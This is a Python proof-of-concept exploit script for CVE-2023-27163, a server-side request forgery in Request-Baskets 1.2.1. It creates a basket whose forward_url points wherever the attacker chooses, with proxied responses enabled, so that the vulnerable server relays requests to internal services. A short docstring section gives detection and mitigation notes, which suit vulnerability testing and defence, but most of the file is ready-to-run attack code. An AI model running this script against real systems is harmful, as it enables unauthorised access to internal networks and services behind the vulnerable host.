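import sys
import random
import string
import requests
import json


def main():
    """Proof of concept for CVE-2023-27163 (SSRF in Request-Baskets 1.2.1).

    Command-line arguments:
        sys.argv[1]: base URL of the Request-Baskets instance.
        sys.argv[2]: URL that the newly created basket will forward to.

    The script sends one POST to ``<base>/api/baskets/<name>``, where
    ``<name>`` is six random lowercase letters, with a JSON body that sets
    ``forward_url`` to the second argument. Because the server accepts an
    arbitrary ``forward_url``, later requests to ``<base>/<name>`` are
    relayed by the server itself, which is the server-side request forgery.

    Defender notes:
        * Detection: basket-creation requests (POST /api/baskets/<name>)
          whose JSON body sets ``forward_url`` to a loopback, link-local or
          otherwise internal address, followed by traffic to ``/<name>``.
        * Mitigation: run a release that addresses CVE-2023-27163, limit
          who can reach the basket-creation API, and restrict outbound
          connections from the host running the service.

    Exits with status 0 when the basket was created (HTTP 201), otherwise 1.
    """
    print("Exploit for SSRF vulnerability on Request-Baskets (1.2.1) (CVE-2023-27163).")

    if len(sys.argv) != 3:
        # The original usage line named no arguments; spell out both.
        print("Usage: python3 exploit.py <request-baskets-url> <forward-url>")
        # sys.exit rather than the bare exit() helper, which is injected by
        # the `site` module and is not guaranteed to exist (e.g. python -S).
        sys.exit(1)

    base_url: str = sys.argv[1]
    forward_url: str = sys.argv[2]

    # The random basket name only avoids colliding with an existing basket.
    random_str: str = ''.join(random.choices(string.ascii_lowercase, k=6))
    attack_url: str = base_url + "/api/baskets/" + random_str

    basket_config = {
        "forward_url": forward_url,
        # NOTE(review): presumably makes the basket return the forwarded
        # service's response to the caller; confirm against the API docs.
        "proxy_response": True,
        "insecure_tls": False,
        "expand_path": True,
        "capacity": 250,
    }

    try:
        r = requests.post(
            attack_url,
            headers={"Content-Type": "application/json"},
            data=json.dumps(basket_config),
            timeout=1,
        )

        # Only 201 is treated as success. Report the real status code
        # instead of claiming every other outcome was a 4XX.
        if r.status_code != 201:
            raise RuntimeError(
                f"Request returned unexpected status {r.status_code} (expected 201)."
            )
    except Exception as e:
        # Top-level boundary of a CLI script: report the failure and exit
        # non-zero rather than dumping a stack trace.
        print(f"Error: request failed.\nTraceback: {e}")
        sys.exit(1)

    print("Exploit successfully executed.")
    print(
        f"Any request sent to {base_url + '/' + random_str} "
        f"will now be forwarded to the service on {forward_url}."
    )
    sys.exit(0)


if __name__ == "__main__":
    main()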